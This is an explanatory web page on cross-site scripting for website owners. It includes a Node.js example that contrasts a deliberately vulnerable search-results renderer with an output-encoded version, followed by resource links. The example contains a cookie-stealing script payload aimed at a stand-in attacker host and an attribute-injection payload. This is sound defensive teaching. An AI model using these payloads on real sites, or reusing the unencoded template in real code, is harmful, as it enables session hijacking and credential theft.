XSS (Cross Site Scripting) Attacks. How can I prevent XSS attacks on my website?
Many websites today are reeling under persistent XSS (cross-site scripting) attacks, in which attacker-supplied script is injected into their web pages. Search engines such as Google then flag the site as harmful and block it in search results, and visitors are stopped from browsing it. Visitors, especially those running outdated browsers, download the malicious code to their PCs or are redirected to the attacker's site, where their sessions are hijacked or sensitive data such as usernames and passwords is captured and used to gain privileged access. The damage falls on the users and the website owner alike.
Many website owners assume this is a problem with the web host, or that their own PCs are virus-infected and the files they upload to the web server carry the infection. That is simply not the case! XSS attacks are generated at runtime by insecure code on your website or web application: the attacker submits script through insecure feedback forms, user registration and login forms, and even search fields, and the site writes that input back into a page without encoding it, so the browser of every visitor who loads the page executes it as part of your site.
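The following is an added example, not code from the original page, showing how a search box or feedback form becomes an XSS vector and how output encoding closes it. The function names, the attacker payloads and the in-memory comment store are all constructed for the demonstration (the hostname attacker.invalid is a placeholder); the check `templateIntact` is tied to this specific template and exists only to make the before/after difference testable.

```javascript
// Added example (not from the original page): a search-results renderer with
// an XSS bug and its hardened form. Runs under Node.js with no dependencies.

// Constructed attacker inputs of the kind a search box or comment form receives.
const SCRIPT_PAYLOAD =
  '<script>location="http://attacker.invalid/?c="+document.cookie</script>';
const ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)';

// VULNERABLE: the query is concatenated straight into the page. Whatever the
// visitor typed (or a link the visitor clicked carried) becomes markup.
function renderSearchVulnerable(query) {
  return `<h2>Results for: ${query}</h2>\n` +
         `<input type="search" name="q" value="${query}">`;
}

// Encode the characters that change meaning in HTML text and in
// double-quoted attribute values. Nothing else is altered.
function encodeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// HARDENED: identical template, but user data is encoded at the point where it
// is written into the page (HTML body text and a quoted attribute value).
function renderSearchSafe(query) {
  const q = encodeHtml(query);
  return `<h2>Results for: ${q}</h2>\n` +
         `<input type="search" name="q" value="${q}">`;
}

// Persistent (stored) variant: a feedback form saves the text and every later
// visitor gets it rendered. Encoding on output is what stops it; filtering on
// input alone is bypassable and mangles legitimate data such as "a < b".
const commentStore = []; // hypothetical in-memory stand-in for a database table
function storeComment(text) {
  commentStore.push(String(text));
  return commentStore.length;
}
function renderCommentsSafe() {
  return '<ul>' +
    commentStore.map((c) => `<li>${encodeHtml(c)}</li>`).join('') +
    '</ul>';
}

// Demonstration check: the search template itself contains exactly three '<'
// and six '"'. Any other count means user data escaped its context.
function templateIntact(html) {
  const lt = (html.match(/</g) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return lt === 3 && quotes === 6;
}

// Summary of both payloads against both renderers.
function demo() {
  return {
    vulnerableScript: templateIntact(renderSearchVulnerable(SCRIPT_PAYLOAD)),  // false
    vulnerableAttr: templateIntact(renderSearchVulnerable(ATTRIBUTE_PAYLOAD)), // false
    safeScript: templateIntact(renderSearchSafe(SCRIPT_PAYLOAD)),             // true
    safeAttr: templateIntact(renderSearchSafe(ATTRIBUTE_PAYLOAD)),            // true
  };
}

console.log(renderSearchVulnerable(SCRIPT_PAYLOAD));
console.log(renderSearchSafe(SCRIPT_PAYLOAD));
console.log(demo());
```

Two caveats a practitioner should keep in mind. First, `encodeHtml` is correct only for HTML text and quoted attribute values; data placed inside a `<script>` block, a URL (`href`, `src`) or a CSS value needs encoding or validation specific to that context, and a `javascript:` URL in an `href` is not neutralised by HTML entity encoding at all. Second, encode where the data is written out, not where it is received: the same stored comment may later be rendered into several different contexts, and only the output site knows which encoding applies.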
Here is a collection of links to online videos and resources that should help you gain a better understanding of XSS and how to prevent XSS attacks on your website:
Video 1: A brief video primer on how SQL injection works.
Video 2: Persistent Cross Site Scripting
Video 3: Don Ankney of Microsoft talks about the continuing challenges around eradicating Cross Site Scripting from the Earth.
Foiling Cross-Site Attacks: An interesting read on XSS and cross-site request forgery (CSRF).